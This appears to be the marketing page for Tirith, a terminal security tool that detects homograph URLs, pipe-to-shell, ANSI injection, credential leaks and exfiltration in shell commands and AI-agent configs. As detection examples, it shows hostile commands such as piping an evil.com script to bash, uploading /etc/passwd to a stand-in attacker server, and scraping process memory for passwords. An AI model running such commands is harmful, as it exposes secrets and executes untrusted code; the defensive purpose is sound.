Terminal Security for the Modern Stack

Your browser would catch this.
Your terminal won't.

Tirith intercepts commands and pastes in your terminal, detecting homograph attacks, pipe-to-shell patterns, ANSI injection, credential leaks, data exfiltration, and 80+ other threats — in under 1ms.

glyph-inspector
$curl https://github.com/org/setup.sh
$curl https://gіthub.com/org/setup.sh
Get StartedView on GitHub
See it work

See It In Action

Click a scenario to see how Tirith responds.

tirith — demo
$

DETECTION

What It Catches

15 threat categories covering every angle of terminal attack surface.

Hostname

CRITICAL

Homograph attacks, punycode, confusable characters, IDN spoofing

$ curl https://gіthub.com/install

Path

HIGH

Non-ASCII paths, homoglyphs, encoded traversal sequences

$ wget example.com/downloаd/v2.tar.gz

Transport

MEDIUM

Insecure HTTP, TLS downgrades, URL shorteners, data URIs

$ curl http://example.com/setup.sh

Terminal

CRITICAL

ANSI injection, bidi overrides, zero-width chars, control sequences

$ echo -e "\x1b[8mhidden"

Command

HIGH

Pipe-to-shell, dotfile persistence, archive bombs, code substitution

$ curl evil.com/run.sh | bash

Environment

HIGH

Proxy hijacking and environment variable manipulation

$ export HTTPS_PROXY=http://evil:8080

Ecosystem

HIGH

Git, Docker, pip, npm, Web3 — supply-chain attack surface

$ docker run --privileged alpine

Config Security

HIGH

AI config poisoning, prompt injection, MCP server validation

$ tirith scan --file .cursorrules

Rendered Content

HIGH

Hidden CSS, color-matched text, comment instructions, PDF hidden text

$ tirith scan --file page.html

Cloaking

HIGH

Server-side cloaking detection — different content for bots vs browsers

$ tirith fetch https://example.com

Policy

CRITICAL

Custom blocklists and organizational security policies

$ curl known-malware-domain.com

Credential Detection

CRITICAL

AWS keys, GitHub PATs, Stripe/Slack/SendGrid tokens, private keys, entropy-based secrets

$ curl -H "Authorization: AKIA..."

Data Exfiltration

HIGH

curl/wget uploads, env var leaks, command substitution sending data to external hosts

$ curl -d @/etc/passwd https://evil.com

Code Scanning

MEDIUM

Obfuscated payloads, dynamic code execution, secret exfiltration in JS/Python files

$ tirith scan evil_skill.py

Post-Compromise

CRITICAL

Process memory scraping, Docker escalation, credential file sweeps — TeamPCP-inspired

$ cat /proc/1/mem | strings | grep pass

REAL-WORLD DEFENSE

Supply Chain Is the New Attack Surface

TeamPCP compromised LiteLLM, Aqua Trivy, and Checkmarx in 5 days. No zero-day needed — just stolen credentials and commands your terminal happily executed.

Tirith won't stop a trojaned package from being installed. But it catches the payload before it does damage — cutting the blast radius at every stage of the kill chain.

Stage 1

Initial Access

UNDETECTABLE

Attack

Stolen credentials used to push trojaned package

LiteLLM, Aqua Trivy, Checkmarx — all in 5 days

Tirith Response

Outside terminal scope — tirith guards what runs after install

Stage 2

Credential Harvesting

BLOCKED

Attack

Payload exports API keys, tokens, and secrets from env vars

$AWS_SECRET_ACCESS_KEY, $GITHUB_TOKEN, $ANTHROPIC_API_KEY

Tirith Response

credential_leak + env_var_exfiltration

Stage 3

Memory Scraping

BLOCKED

Attack

Reads /proc/*/mem to extract secrets from running processes

Every secret in your CI runner or dev machine memory

Tirith Response

proc_memory_scraping

Stage 4

Privilege Escalation

BLOCKED

Attack

Mounts host root filesystem via Docker remote daemon

Full host access from inside a container

Tirith Response

docker_remote_escalation

Stage 5

Persistence

BLOCKED

Attack

Sweeps .aws/credentials, .ssh/id_rsa, .gnupg/ for lateral movement

Every credential file on disk

Tirith Response

credential_file_sweep

Stage 6

Exfiltration

BLOCKED

Attack

Uploads stolen data to attacker-controlled server via curl

curl -d @/etc/passwd https://c2.attacker.com/collect

Tirith Response

curl_data_upload + data_exfiltration

5 of 6 kill chain stages intercepted

Tirith can't prevent a compromised package from being published. But every post-install payload — credential theft, memory scraping, privilege escalation, exfiltration — gets caught before it does damage. That's the difference between a breach and a blocked command.

ARCHITECTURE

How It Works

A 3-tier pipeline that balances speed with thoroughness.

Tier 1

Fast Gate

< 0.1ms

Regex-powered initial filter eliminates 99% of clean commands instantly.

Tier 2

Extract

URL + Refs

Parses URLs, Docker references, and package identifiers from complex commands.

Tier 3

Analyze

80+ Rules

80+ rules across 15 categories — homographs, injection, supply-chain, credential detection, exfiltration, and more.

AI Agent Security

Protect AI coding agents at every layer — from the configs they read to the skills they download to the commands they execute. One command to set up. Zero friction on clean input.

MCP Server — 7 Tools

AI agents call these tools before taking action. Run tirith mcp-server to start.

tirith_check_command

Analyze shell commands

tirith_check_url

Score URLs for attacks

tirith_check_paste

Check pasted content

tirith_scan_file

Scan files for hidden content

tirith_scan_directory

Recursive directory scan

tirith_verify_mcp_config

Validate MCP configs

tirith_fetch_cloaking

Detect server-side cloaking

Skill & Plugin Scanning

Download skills, plugins, and MCP tools without worrying. Tirith scans every file for obfuscated payloads, dynamic code execution, and secret exfiltration before your agent runs it.

Config Poisoning

Scans 50+ AI config file patterns (.cursorrules, CLAUDE.md, .mcp.json, and more) for prompt injection, invisible Unicode, and permission bypass attempts.

Hidden Content

Detects content invisible to humans but readable by AI — CSS hiding, color tricks, sub-pixel PDF text, and HTML comment injection.

Server Cloaking

Compares responses across 6 user-agents to catch servers that serve different content to AI bots vs browsers.

One Command Setup

shell
$tirith setup claude-code --with-mcp
$tirith setup codex
$tirith setup cursor
$tirith setup gemini-cli --with-mcp
$tirith setup pi-cli
$tirith setup vscode
$tirith setup windsurf

Detailed setup guides

0+
Rules
0
Categories
<0ms
Latency
0
Network Calls
0
MCP Tools

CLI

Commands

Everything runs locally. Zero network calls unless you explicitly ask.

Analyze

tirith check -- <cmd>Analyze a command without executing it
tirith pasteCheck pasted content (auto-called by shell hooks)
tirith scan [path]Scan files/dirs for hidden content, config poisoning, malicious code. Supports --sarif and --ci --fail-on high
tirith run <url>Safe curl|bash replacement. Downloads, analyzes, shows SHA256, opens for review, executes after confirmation

Investigate

tirith score <url>Break down a URL's trust signals
tirith diff <url>Byte-level comparison showing where suspicious characters hide
tirith fetch <url>Detect server-side cloaking (different content for bots vs browsers)
tirith whyExplain the last rule that triggered

Operate

tirith receiptTrack and verify scripts run through tirith run (last, list, verify)
tirith checkpointSnapshot files before risky operations, roll back if needed (create, restore, diff)
tirith auditAudit log management for compliance (export, stats, report)

Setup

tirith setup <tool>One-command setup for AI coding tools
tirith gateway runMCP gateway proxy for intercepting AI agent shell tool calls
tirith initPrint the shell hook for your shell profile
tirith doctorDiagnostic check for hook status and configuration
tirith mcp-serverRun as MCP server over JSON-RPC stdio

PRICING

Free for Everyone. Built for Teams.

All detection rules run at every tier. Paid plans add compliance, policy distribution, and enterprise integrations.

Community

Free forever

Everything you need for terminal security. No account required.

  • Full detection engine (all 80+ rules)
  • Shell hooks — Bash, Zsh, Fish, PowerShell
  • MCP server for AI coding tools
  • Local JSONL audit log
  • YAML policy system
  • SARIF output for CI/CD
  • Zero network calls — fully offline
  • Cross-platform — macOS, Linux, Windows
  • Open source
Get StartedSponsor

Team / Enterprise

Contact us

Everything in Community, plus:

  • MITRE ATT&CK technique mapping
  • Remote policy distribution
  • Centralized audit log collection
  • Custom DLP redaction patterns
  • Webhooks — Slack, Teams, PagerDuty
  • SSO/SAML — Okta, Azure AD
  • Air-gapped / on-premises deployment
  • Dedicated account manager & SLA
Contact Sales

INSTALL

Installation

Install Tirith with your favorite package manager.

brew install sheeki03/tap/tirith

Shell Activation

# zsh (~/.zshrc)
eval "$(tirith init --shell zsh)"

# bash (~/.bashrc)
eval "$(tirith init --shell bash)"

# fish (~/.config/fish/config.fish)
tirith init --shell fish | source

# PowerShell ($PROFILE)
# tirith init --shell powershell | Invoke-Expression